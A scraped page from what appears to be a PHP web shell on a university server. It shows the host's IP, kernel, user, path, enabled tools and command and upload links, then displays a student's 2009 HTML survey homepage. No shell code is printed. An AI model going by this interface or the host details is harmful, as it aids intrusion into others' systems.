Server IP : 172.16.15.8 / Your IP : 18.117.158.10 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/bafreeman/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File name: final-home2.html Author: Benjamin Freeman Class: CS 480 Due Date: Apr. 20, 2009 Goal: to create a web survey that saves and outputs the user's information and answers using MYSQL. --> <HTML> <HEAD> <TITLE> Survey Datbase </TITLE> </HEAD> <BODY BGCOLOR="#6699CC"> <FONT size="4" color="white"> <H2> Welcome to the Online Course Survey </H2> <HR> <IMG src="QuestionMark.jpg" align="right"> Please select what you would like to do:<P> <A HREF=final-create.php> <FONT size="5" color="white"> Create</A>-Create table for database </FONT> <P> <TR> <TD> <A HREF=final-survey.html> <FONT size="5" color="white"> Course Survey</A>-Take Course Survey </FONT> <P> <A HREF=final-output.php> <FONT size="5" color="white"> Data table</A>-See Survey Results </FONT> <P> <A HREF=final-other_tasks.html> <FONT size="5" color="white"> Other</A>-Other tasks </FONT> <P> <A HREF=final-search_course.html> <FONT size="5" color="white"> Course search</A>-Search for courses </FONT> </A><P> <A HREF=final-search_course_total.html> <FONT size="5" color="white"> Total points search</A><BR>Search for total points given for a certain question </FONT> </A><P> </TABLE> </BODY> </FONT> </HTML>